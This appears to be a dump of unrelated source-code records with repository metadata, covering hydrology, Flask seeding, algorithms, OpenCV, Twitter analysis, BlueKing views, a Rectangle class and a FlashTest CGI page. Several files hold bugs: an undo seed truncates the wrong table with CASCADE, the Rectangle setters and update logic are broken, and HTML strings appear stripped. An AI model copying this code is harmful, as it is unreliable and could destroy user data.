self.var.RicePlantingDay1),\n RiceFloodingDemandM3 + RiceEvaporationDemandM3, maskinfo.in_zero()) # m3 per time interval\n # part of the evaporation is already taken out in soil module!\n # assumption is that a fixed water layer is kept on the rice fields, totalling RiceFlooding*10 in mmm (typically 50 or 100 mm)\n # application is spread out over 10 days\n # open water evaporation at the same time\n\n \"\"\" phase 3: planting, while keep constant water level during growing season (open water evaporation) \"\"\"\n # RiceEvaporationM3=if((CalendarDay ge RicePlantingDay1) and (CalendarDay le (RiceHarvestDay1-20)),EWRef*RiceFraction*MMtoM3,0)\n # RiceEvaporationM3 = np.where((self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20), RiceEva * self.var.RiceFraction*self.var.MMtoM3 , maskinfo.in_zero()) #original\n RiceEvaporationM3 = np.where(\n (self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20),\n RiceEvaporationDemandM3, maskinfo.in_zero()) # m3 per time interval\n\n # substracting the soil evaporation which was already taken off in the soil module (also transpitation should be tyaken off )\n\n # RicePercolationM3=if((CalendarDay ge RicePlantingDay1) and (CalendarDay le (RiceHarvestDay1-20)),RicePercolation*RiceFraction*MMtoM3,0)\n RicePercolationDemandM3 = self.var.RicePercolation * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n # RicePercolationM3 = np.where((self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20), 
self.var.RicePercolation*self.var.RiceFraction*self.var.MMtoM3, maskinfo.in_zero()) #original\n RicePercolationM3 = np.where(\n (self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20),\n RicePercolationDemandM3, maskinfo.in_zero()) # m3 per time interval\n # FAO: percolation for heavy clay soils: PERC = 2 mm/day\n self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3 = RiceSoilSaturationM3 + RiceFloodingM3 + RiceEvaporationM3 + RicePercolationM3 # m3 per time interval\n # m3 water needed for paddyrice\n\n # self.var.TotalAbstractionFromSurfaceWaterM3 = self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3\n\n \"\"\"# phase 4: stop keeping constant water level 20 days before harvest date\n phase 5: start draining 10 days before harvest date\"\"\"\n # RiceDrainageM3=if((CalendarDay ge (RiceHarvestDay1-10)) and (CalendarDay le RiceHarvestDay1),(WS1-WFC1+WS2-WFC2)*RiceFraction*MMtoM3,0)\n\n RiceDrainageDemandM3 = (self.var.WS1[0] - self.var.WFC1[0] + self.var.WS2[0] - self.var.WFC2[\n 0]) * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n RiceDrainageM3 = np.where(\n (self.var.CalendarDay >= ha_10) & (self.var.CalendarDay < self.var.RiceHarvestDay1),\n 0.1 * RiceDrainageDemandM3, maskinfo.in_zero())\n # RiceDrainageM3 = np.where((self.var.CalendarDay >= ha_10) & (self.var.CalendarDay < self.var.RiceHarvestDay1),\n # 0.1 * (self.var.WS1[0]-self.var.WFC1[0] + self.var.WS2[1]-self.var.WFC2[1]) * self.var.RiceFraction*self.var.MMtoM3,maskinfo.in_zero()) #original\n\n # drainage until FC to soil/groundwater at end of season\n # assumption that the last weeks before harvest the 50mm water layer is completely evaporating\n # needs to be transported to channel system or being drained\n\n # UZLoop1 += cover((RiceDrainageM3+RicePercolationM3)*M3toMM/OtherFraction,0)\n self.var.UZ[0] += np.where(self.var.OtherFraction > 0.0,\n (RiceDrainageM3 + RicePercolationM3) * self.var.M3toMM / self.var.OtherFraction,\n 0.0)\n # drained water is added to Upper Zone\n","repo_name":"hzeinivand/lisflood","sub_path":"src/lisflood/hydrological_modules/riceirrigation.py","file_name":"riceirrigation.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4526932381","text":"from app.models import db, PlaylistReview, environment, SCHEMA\nfrom sqlalchemy.sql import text\n\ndef seed_playlist_reviews():\n review1 = PlaylistReview(\n review = f\"Finally, we come to Forever After All, where Luke kicks off with talk about “cold beer” and we're firmly placing our feet back in Nashville cliché territory. As before, it's a big arena ballad with that big chorus and Comb's driving it along with his vocal.\",\n\n playlist_id = 1,\n user_id = 1\n )\n review2 = PlaylistReview(\n review = f\"Up next is Comb's version of a honky tonk song in My Kinda Folk. Musically it's a fun little song, filled again with the clichés of Nashville country music. It's a party song that'll surely work well after a few beers in a live setting. It's Music Row country without a doubt, but its done well.\",\n\n playlist_id = 2,\n user_id = 2\n )\n\n db.session.add(review1)\n db.session.add(review2)\n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE or DELETE the users table. SQLAlchemy doesn't\n# have a built in function to do this. 
With postgres in production TRUNCATE\n# removes all the data from the table, and RESET IDENTITY resets the auto\n# incrementing primary key, CASCADE deletes any dependent entities. With\n# sqlite3 in development you need to instead use DELETE to remove all data and\n# it will reset the primary keys for you as well.\ndef undo_playlist_reviews():\n if environment == \"production\":\n db.session.execute(f\"TRUNCATE table {SCHEMA}.users RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(text(\"DELETE FROM playlist_reviews\"))\n\n db.session.commit()\n","repo_name":"lee963654/spnotify","sub_path":"app/seeds/playlist_review.py","file_name":"playlist_review.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71609900328","text":"#python3\nimport sys\n\ndef get_change(amount):\n coins = [1, 3, 4]\n solution = [0 for i in range(amount+1)]\n\n for i in range(amount+1):\n min_coins = float('inf')\n for j in coins:\n if i == 0:\n solution[i] = 0\n else:\n if j <= i:\n min_coins = min(min_coins, 1 + solution[i - j])\n solution[i] = min_coins\n \n return solution[amount]\n\n\nif __name__ == '__main__':\n m = int(sys.stdin.read())\n print(get_change(m))\n\n","repo_name":"calam1/coursera","sub_path":"ucsd_algorithms/ucsd_course_1/week_5/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41628682018","text":"import numpy as np\nimport cv2\nimport time\nimport card_detector as cd\n\ndef check_image_difference(img1, img2):\n\n diff = cv2.absdiff(last_frame, frame)\n cv2.imshow(\"diff\", diff)\n return\n\n\ncap = cv2.VideoCapture(0)\ncd.load_cards()\n\n#ret, last_frame = cap.read()\n#ret, one_frame = cap.read()\n#last_time = time.time()\n#temp_diff = cv2.absdiff(last_frame, one_frame)\n#last_diff = temp_diff.sum()\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n\n# if (time.time()-last_time) > 5:\n# diff = cv2.absdiff(last_frame, frame)\n# diff_sum = diff.sum()\n\n# print min(last_diff,diff_sum)/float(max(last_diff, diff_sum))\n# \n# if min(last_diff,diff_sum)/float(max(last_diff, diff_sum)) > 0.50:\n# cv2.imshow(\"diff\", diff)\n# last_diff = diff_sum\n#\n# last_time = time.time()\n# last_frame = frame\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"detecting...\")\n image = frame\n cd.detect_cards(image)\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"mspkvp/CardDetectorOpenCV","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18270914366","text":"import pickle\r\nimport pandas as pd\r\nimport json \r\nimport numpy as np\r\nimport math\r\n\r\nclass ModelPrediction:\r\n def loadModel(self, filename):\r\n model = pickle.load(open(filename, 'rb'))\r\n print('leido pikle')\r\n return model\r\n def predict(self,model,data):\r\n #calculo\r\n datos = data.copy()\r\n df = pd.DataFrame(datos)\r\n #df = df.set_index('DateObserved')\r\n print(df.info)\r\n #realizo prediccion y calculo distancia\r\n iso_prediction = model.predict(df)\r\n iso_core = model.score_samples(df)\r\n #calculo 
si es una anomalia y su probabilidad\r\n df['anomaly'] =(iso_prediction[0]==-1)\r\n df['probabilty'] = iso_core[0] *100*-1*df['anomaly']\r\n\r\n return df ","repo_name":"stefaniaeuropea/deteccion_anomalias","sub_path":"deploy/ModelPrediction.py","file_name":"ModelPrediction.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9772322089","text":"import os\n\nos.system(\"find * -name *.cpp > data\")\nfile = open(\"data\")\nwhile True:\n line = file.readline().rstrip('\\n')\n if not line:\n break\n cmd = \"nohup cpplint \" + line\n os.system(cmd)\nos.system(\"rm -rf data\")\n","repo_name":"SeenHit/RepoAnalyseTool","sub_path":"cpplintSearchAll.py","file_name":"cpplintSearchAll.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453031085","text":"from typing import List, Set\n\n\nclass Solution:\n def splitArray(self, nums: List[int]) -> bool:\n return len(nums) > 6 and any(\n self.dfs(nums[:i]) & self.dfs(nums[i + 1 :])\n for i in range(3, len(nums) - 3)\n )\n\n def dfs(self, nums: List[int]) -> Set[int]:\n total = sum(nums)\n prefix_sum = [0 for _ in range(len(nums))]\n cur_sum = 0\n for i in range(0, len(nums)):\n cur_sum += nums[i]\n prefix_sum[i] = cur_sum\n return {\n prefix_sum[i - 1]\n for i in range(1, len(nums))\n if total - prefix_sum[i] == prefix_sum[i - 1]\n }\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"548_Split_Array_with_Equal_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14806401605","text":"import hw5_twitter\nimport sys\n\nusername1=sys.argv[1]\nusername2=sys.argv[2]\nnum_tweets=sys.argv[3]\n\nfreq_user1=hw5_twitter.frequency_of_words(username1,num_tweets)\nfreq_user2=hw5_twitter.frequency_of_words(username2,num_tweets)\n\n\ncommon_list=[]\nfor i in freq_user1:\n for j in freq_user2:\n if i[0] == j[0]:\n num=0\n num=i[1]+j[1]\n common_list.append((j[0],num))\n\ndef diffe_list(sample_list,common_list):\n word_sample_list=[]\n for i in sample_list:\n word_sample_list.append(i[0])\n word_common_list=[]\n for j in common_list:\n word_common_list.append(j[0])\n word_diff_list=list(set(word_sample_list)-set(word_common_list))\n diff_list=[]\n for i in sample_list:\n for j in word_diff_list:\n if i[0] == j:\n diff_list.append(i)\n return diff_list\n\ndiff_list1=diffe_list(freq_user1,common_list)\ndiff_list2=diffe_list(freq_user2,common_list)\ndiff_list=diff_list1+diff_list2\n\ntop_common_list=hw5_twitter.top_five(common_list)\ntop_diff_list=hw5_twitter.top_five(diff_list)\n\nprint(top_common_list)\nprint(top_diff_list)\n","repo_name":"jingwenc/SI507HW5-EC1","sub_path":"twitter_boggle.py","file_name":"twitter_boggle.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1570200012","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport time\nimport base64\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom blueking.component.shortcuts import get_client_by_request, get_client_by_user\nfrom common.log import logger\nfrom common.mymako import render_mako_context\nfrom common.mymako import render_json\nfrom common_esb import *\nfrom django.forms.models import 
model_to_dict\n\nfrom home_application.models import HostInfo, HostLoad5\n\n\ndef home(request):\n \"\"\"\n 首页\n \"\"\"\n return render_mako_context(request, '/home_application/home.html')\n\n\ndef dev_guide(request):\n \"\"\"\n 开发指引\n \"\"\"\n return render_mako_context(request, '/home_application/dev_guide.html')\n\n\ndef contactus(request):\n \"\"\"\n 联系我们\n \"\"\"\n return render_mako_context(request, '/home_application/contact.html')\n\n\ndef history(request):\n return render_mako_context(request, '/home_application/history.html')\n\n\ndef test(request):\n return render_json({\"result\": 'ok', \"username\": request.user.username})\n\n\n@csrf_exempt\ndef get_biz(request):\n client = get_client_by_request(request)\n res = search_business_esb(client, request.user.username)\n return render_json(res)\n\n\n@csrf_exempt\ndef get_set(request):\n bk_biz_id = request.GET.get('bk_biz_id')\n client = get_client_by_request(request)\n res = search_set_esb(client, request.user.username, bk_biz_id)\n return render_json(res)\n\n\n@csrf_exempt\ndef get_host(request):\n params = json.loads(request.body)\n bk_host_innerip__in = params.get('bk_host_innerip__in')\n client = get_client_by_request(request)\n res = search_host_esb(client, request.user.username)\n result = []\n for item in res['data']:\n params = {\n 'bk_host_innerip': item['host']['bk_host_innerip'],\n 'bk_host_name': item['host']['bk_host_name'],\n 'bk_os_name': item['host']['bk_os_name'],\n 'bk_inst_name': item['host']['bk_cloud_id'][0]['bk_inst_name'],\n 'bk_cloud_id': item['host']['bk_cloud_id'][0]['id'],\n 'bk_biz_id': item['biz'][0]['bk_biz_id'],\n 'bk_biz_name': item['biz'][0]['bk_biz_name'],\n 'last_user': request.user.username\n }\n host_info, is_exist = HostInfo.objects.update_or_create(**params)\n if is_exist:\n host_info.last_user = request.user.username\n host_info.save()\n\n if bk_host_innerip__in:\n bk_host_innerip__in = bk_host_innerip__in.split(',')\n host_info = HostInfo.objects.filter(bk_host_innerip__in=bk_host_innerip__in, is_delete=False)\n else:\n host_info = HostInfo.objects.filter(is_delete=False)\n for host in host_info:\n result.append(model_to_dict(host))\n\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef list_host(request):\n bk_biz_id = request.GET.get('bk_biz_id')\n client = get_client_by_request(request)\n res = search_host_esb(client, request.user.username, bk_biz_id)\n result = []\n for item in res['data']:\n params = {\n 'bk_host_innerip': item['host']['bk_host_innerip']\n }\n result.append(params)\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef add_host(request):\n params = json.loads(request.body)\n ip = params['ip']\n host_info = HostInfo.objects.filter(bk_host_innerip=ip, is_delete=False)\n if host_info:\n result = u'主机已存在'\n else:\n HostInfo.objects.filter(bk_host_innerip=ip).update(is_delete=False)\n result = u'添加成功'\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef delete_host(request):\n params = json.loads(request.body)\n ip = params['ip']\n HostInfo.objects.filter(bk_host_innerip=ip).update(is_delete=True)\n return render_json({'data': u'删除成功'})\n\n\n@csrf_exempt\ndef display_performance(request):\n def generate_data(pfm_list):\n if not pfm_list:\n return None\n xAxis = []\n series = []\n load5 = []\n\n for host_pfm in pfm_list:\n xAxis.append(host_pfm.check_time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n load5.append(host_pfm.load5)\n series.append({\n 'name': 'load5',\n 'type': 'line',\n 'data': load5\n })\n return {\n \"xAxis\": xAxis,\n \"series\": series,\n 
\"title\": pfm_list[0].bk_host_innerip.bk_host_innerip\n }\n\n ip = request.GET.get('ip')\n now = datetime.datetime.now()\n load5 = HostLoad5.objects.filter(bk_host_innerip=ip)\n load5_result = generate_data(load5)\n return render_json({'load5': load5_result})\n\n\n@csrf_exempt\ndef get_load5(request):\n host_info_list = HostInfo.objects.filter(is_delete=False)\n\n ip_list = []\n if not host_info_list:\n return\n else:\n username = host_info_list[0].last_user\n bk_biz_id = host_info_list[0].bk_biz_id\n\n for host_info in host_info_list:\n ip_list.append({\n 'ip': host_info.bk_host_innerip,\n 'bk_cloud_id': host_info.bk_cloud_id\n })\n\n client = get_client_by_user(username)\n load5_script = '''#!/bin/bash\ncat /proc/loadavg'''\n\n mem_script = '''#!/bin/bash\nfree –m'''\n\n disk_script = '''#!/bin/bash\ndf –h'''\n\n data = {\n 'ip_list': ip_list,\n 'bk_biz_id': bk_biz_id\n }\n res = fast_execute_script_esb(client, 'admin', data, base64.b64encode(load5_script))\n time.sleep(5)\n if res['data']:\n params = {}\n params.update({'bk_biz_id': data['bk_biz_id'], 'job_instance_id': res['data']['job_instance_id']})\n res = get_job_instance_log_esb(client, 'admin', params)\n\n for i in range(5):\n if res['data'][0]['status'] != 3:\n time.sleep(2)\n res = get_job_instance_log_esb(client, 'admin', params)\n else:\n break\n\n if res['data'][0]['status'] == 3:\n # 处理性能数据\n try:\n pfm_data = res['data'][0]['step_results'][0]['ip_logs']\n except KeyError:\n pfm_data = []\n for item in pfm_data:\n result = item['log_content'].split(' ')\n load5 = result[1]\n mem = result[1]\n disk = result[2]\n cpu = result[3]\n ip = item['ip']\n host_info = HostInfo.objects.get(bk_host_innerip=ip)\n host_pfm = HostLoad5.objects.create(\n bk_host_innerip=host_info,\n check_time=datetime.datetime.now(),\n load5=load5\n )\n now = datetime.datetime.now()\n logger.info(u\"主机{}完成一条性能查询:{}\".format(host_pfm.bk_host_innerip, now))\n\n\nclass CommonUtil(object):\n\n @classmethod\n def pop_useless_params(self, params):\n # 请求参数处理\n pop_keys = []\n for key, value in params.items():\n if value == '':\n pop_keys.append(key)\n if key.endswith('__in'):\n params[key] = str(value).split(',')\n for pop in pop_keys:\n params.pop(pop)\n return params\n","repo_name":"owenlinmz/saas-practice-2nd","sub_path":"home_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42126079158","text":"'''\nhttps://www.codewars.com/kata/5828713ed04efde70e000346/train/python\n\nYou will be given an array of objects (associative arrays in PHP) representing \ndata about developers who have signed up to attend the next coding meetup that you are organising.\n\nYour task is to return an object (associative array in PHP) which includes the count of each \ncoding language represented at the meetup.\n\n'''\n# from collections import Counter\n# def count_languages(lst): \n# return Counter(dev[\"language\"] for dev in lst)\n \ndef count_languages(lst):\n # count = {}\n # for dev in lst:\n # l = dev[\"language\"]\n # if l in count: \n # count[l] += 1\n # else:\n # count[l] = 1\n # return count\n\n language = [dev[\"language\"] for dev in lst]\n return {i: language.count(i) for i in language}\n\n\nlist1 = [\n { 'firstName': 'Noah', 'lastName': 'M.', 'country': 'Switzerland', 'continent': 'Europe', 'age': 19, 'language': 'C' },\n { 'firstName': 'Anna', 'lastName': 'R.', 'country': 'Liechtenstein', 'continent': 'Europe', 'age': 52, 
'language': 'JavaScript' },\n { 'firstName': 'Ramon', 'lastName': 'R.', 'country': 'Paraguay', 'continent': 'Americas', 'age': 29, 'language': 'Ruby' },\n { 'firstName': 'George', 'lastName': 'B.', 'country': 'England', 'continent': 'Europe', 'age': 81, 'language': 'C' },\n]\n\nprint(count_languages(list1))","repo_name":"davemolk/python_practice","sub_path":"7kyu_coding_meetup5.py","file_name":"7kyu_coding_meetup5.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16135565939","text":"#!/usr/bin/python3\n\"\"\"Module for our rectangle class\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Representing a rectangle class\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"initializing the rectangle\"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\"retrieving width of the rectangle\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"setting the value of the width\"\"\"\n if (type(value) is not int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\"retrieving height of the rectangle\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"setting the value of the height\"\"\"\n if (type(value) is not int):\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\"retrieving x of the rectangle\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"setting the value of the x\"\"\"\n if (type(value) is not int):\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"retrieving y of the rectangle\"\"\"\n return self.__y\n\n @width.setter\n def y(self, value):\n \"\"\"setting the value of the y\"\"\"\n if (type(value) is not int):\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\"retrieving the area of the rectangle\"\"\"\n return (self.__width * self.__height)\n\n def display(self):\n \"\"\"Displays the rectangle using #\"\"\"\n for y in range(self.y):\n print(\"\")\n for i in range(self.__height):\n for x in range(self.x):\n print(\" \", end=\"\")\n for j in range(self.__width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n \"\"\"format for the string representation of the class\"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".\\\n format(\"Rectangle\", self.id, self.__x, self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\"updates instance attributes\"\"\"\n if args and len(args) != 0:\n x = 0\n for i in args:\n if x == 0:\n if i is None:\n self.__init__(self.width, self.height, self.x, self.y)\n else:\n self.id = i\n elif x == 1:\n self.width = i\n elif x == 2:\n self.height = i\n elif x == 3:\n self.x = i\n elif x == 4:\n self.y = i\n a += 1\n\n elif kwargs and len(kwargs) != 0:\n for a, b in kwargs.items():\n if a == \"id\":\n if b is None:\n self.__init__(self.width, self.height, self.x, self.y)\n else:\n self.id = b\n elif a == width:\n self.width = b\n elif a == height:\n self.height = b\n elif a == \"x\":\n self.x = b\n elif a 
== \"y\":\n self.y = b\n\n def to_dictionary(self):\n \"\"\"Returns dictionary representation of the class\"\"\"\n return {\"id\": self.id, \"width\": self.__width, \"height\": self.__height, \"x\": self.__x, \"y\": self.__y}\n","repo_name":"Its-Ajua/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15113357872","text":"#!/usr/bin/env python3\nimport sys, os\nimport cgi, pickle, tempfile\nimport purgeTmp\nsys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), \"lib\"))\nimport invocations, littleParser\n\nfileMap = \"fileMap\"\n\ndef abort(msg):\n print(\"\")\n print(msg)\n print(\"\")\n print(\"\")\n sys.exit(0)\n\ndef rewriteFileMap(fileMapDict):\n # rewrite \"fileMap\" with new additions/deletions\n text = \"# THIS IS A COMPUTER GENERATED FILE! DO NOT EDIT!\\n\"\n text += \"\\n\".join([\"%s: %s\" % (key, fileMapDict[key]) for key in list(fileMapDict.keys())])\n open(fileMap,\"w\").write(text)\n\n# FlashTest's main results board showing red or green lights\n# for FlashTest invocations with failures or no failures.\n\n# first purge all files over 24 hours old from \"tmp\"\npurgeTmp.purgeTmp()\n\nprint(\"Content-type: text/html\\n\")\nprint(\"\")\nprint(\"Flash-X A Multiphysics Multidomain Software \")\n\n# next three lines ensure browsers don't cache, as caching can cause false\n# appearances of the \"please wait while the table is being regenerated\" if\n# the user uses the browser's \"back\" button.\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\nprint(open(f'{os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), \"style.css\")}',\"r\").read())\nprint(\"\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\n# make sure website has write permissions in this folder\ncwd = os.getcwd()\nif not os.access(cwd, os.W_OK):\n msg = (\"The web-server does not have write permissions in directory \\\"%s\\\"
    \" % cwd +\n \"This permission must be granted for FlashTestView to function correctly.\")\n abort(msg)\n\n# Generate fileMapDict from \"fileMap\", a text file that maps\n# paths to output directories to their associated \".pick\" files.\nif os.path.isfile(fileMap):\n # Paul, uncomment the lines below and delete this line when you've fixed the file permissions\n if not os.access(fileMap, os.R_OK + os.W_OK):\n msg = (\"The web-server does not have read and/or write permissions on file \\\"%s\\\"
    \" % os.path.join(cwd, fileMap) +\n \"This permission must be granted for FlashTestView to function correctly.\")\n abort(msg)\n else:\n fileMapDict = littleParser.parseFile(fileMap)\nelse:\n fileMapDict = {}\n\nif os.path.isfile(\"config\"):\n configDict = littleParser.parseFile(\"config\")\n pathsToOutdirs = configDict.get(\"pathToOutdir\", []) # returns a string if only one value\n # associated with key, else a list\n\n # Make 'pathToOutdir' into a list if it's not one already.\n # If the list has more than one element, we'll eventually\n # use it to make the drop-down menu that lets the user\n # visualize different collections of FlashTest data\n if not isinstance(pathsToOutdirs, list):\n pathsToOutdirs = [pathsToOutdirs]\n\n # delete any .pick files whose corresponding path\n # no longer appears in 'configDict' and eliminate\n # the appropriate entry in 'fileMapDict'\n fileMapNeedsRewrite = False\n for key in list(fileMapDict.keys())[:]:\n if key not in pathsToOutdirs:\n try:\n os.remove(fileMapDict[key])\n except:\n pass\n del fileMapDict[key]\n fileMapNeedsRewrite = True\n\n if fileMapNeedsRewrite:\n rewriteFileMap(fileMapDict)\n\nelse:\n configDict = {}\n pathsToOutdirs = []\n\npickFile = \"\"\nform = cgi.FieldStorage()\npathToTargetDir = form.getvalue(\"target_dir\")\nthisPageNum = form.getvalue(\"page\")\n\nif pathToTargetDir:\n if configDict:\n if pathToTargetDir in pathsToOutdirs:\n if not os.path.isdir(pathToTargetDir):\n if pathToTargetDir in fileMapDict:\n del fileMapDict[pathToTargetDir]\n rewriteFileMap(fileMapDict)\n abort(\"\\\"%s\\\" does not exist or is not a directory.\" % pathToTargetDir)\n else:\n abort(\"Directory \\\"%s\\\" not listed as a value for key \\\"pathToOutdir\\\" in \\\"config\\\".
    \" % pathToTargetDir +\n \"Add this directory to \\\"config\\\" and reload this page.\")\n else:\n abort(\"File \\\"config\\\" either does not exist or does not contain any values.
    \"+\n \"Create a \\\"config\\\" file if necessary and add the following text:

    \" +\n \"pathToOutdir: %s

    \" % pathToTargetDir +\n \"Then reload this page.\")\nelse:\n if configDict:\n if pathsToOutdirs:\n pathToTargetDir = pathsToOutdirs[0]\n if not os.path.isdir(pathToTargetDir):\n if pathToTargetDir in fileMapDict:\n del fileMapDict[pathToTargetDir]\n rewriteFileMap(fileMapDict)\n abort(\"\\\"%s\\\" as listed in \\\"config\\\"
    \" % pathToTargetDir +\n \"does not exist or is not a directory.\")\n else:\n abort(\"You must add at least one value to the key \\\"pathToOutdir\\\" in \\\"config\\\"
    \" +\n \"where that value is a path to a top-level FlashTest output directory.\")\n else:\n abort(\"File \\\"config\\\" either does not exist or does not contain any values.
    \" +\n \"Create a \\\"config\\\" file if necessary and add the following text:

    \" +\n \"pathToOutdir: [path/to/outdir]

    \" +\n \"where [path/to/outdir] is an absolute path to a top-level FlashTest output directory.
    \" +\n \"Then reload this page.\")\n\n\n# At this point we know that 'pathToTargetDir' is defined, that it is\n# an extant directory, and that that directory is listed in \"config\"\n\nif pathToTargetDir in fileMapDict:\n pickFile = fileMapDict[pathToTargetDir]\n bigBoard = pickle.load(open(pickFile, 'rb'))\n if bigBoard.isOutOfDate():\n print(\"\")\n print(\"
    \")\n print(\"FlashTest has generated new data since the last time this page was viewed.
    \")\n print(\"Please wait while the table is being regenerated.\")\n print(\"
    \")\n sys.stdout.flush()\n bigBoard.quickRegenerate()\n pickle.dump(bigBoard, open(pickFile, \"w\"))\n else:\n print(\"\")\nelse:\n print(\"\")\n print(\"
    \")\n print(\"Please wait while FlashTestView generates a table for \\\"%s\\\".\" % pathToTargetDir)\n print(\"
    \")\n sys.stdout.flush()\n bigBoard = invocations.BigBoard(pathToTargetDir)\n newFile, newFileName = tempfile.mkstemp(suffix=\".pick\", prefix=\"\", dir=os.getcwd())\n os.chmod(newFileName, 256 + 32 + 4 + 128 + 16) # make 'newFile' readable by all,\n # writeable by owner and group\n pickle.dump(bigBoard, os.fdopen(newFile, \"wb\"))\n fileMapDict[pathToTargetDir] = newFileName\n rewriteFileMap(fileMapDict)\n\n# At this point, 'bigBoard' exists, and is updated.\n\n# floating div which will be populated with the stats\n# from one invocation when user hovers over a datestamp\nprint(\"
    \")\nprint(\"
    \")\nprint(\"
    \")\nprint(\"
    \")\n\n# start main page\nprint(\"
    \")\nprint(\"FlashTest HOW-TO\")\nprint(\"
    \")\nprint(\"
     
    \")\nprint(\"
    \")\nprint(\"

    FlashTest Invocations

    \")\nprint(\"
    \")\n\n# make bar with navigation to other \"pages\" of results.\ninvocationsPerPage = int(configDict.get(\"invocationsPerPage\", 50))\n\nnumRows = bigBoard.numRows\n\nif numRows > invocationsPerPage:\n lastPageNum = ((numRows-1) / invocationsPerPage) + 1\n try:\n thisPageNum = int(thisPageNum)\n except:\n # No page number in query-string, so 'thisPageNum' was None.\n # Either that or some joker entered a non-numerical value in URL bar.\n thisPageNum = lastPageNum\n else:\n if thisPageNum < 1:\n # some joker entered '0', probably\n thisPageNum = 1\n elif thisPageNum > lastPageNum:\n # some joker entered something too high\n thisPageNum = lastPageNum\n\n # This is tricky because the *smaller* the value of 'thisPageNum',\n # the further we reach back in time, and the *greater* the indices\n # of the invocations we need to examine. Therefore, to help with the\n # arithmetic, we create 'reversedPageNum', whose value gets higher\n # with the indices (but not the dates) of the invocations.\n reversedPageNum = (lastPageNum + 1) - thisPageNum\n\n print(\"
     
    \")\n print(\"
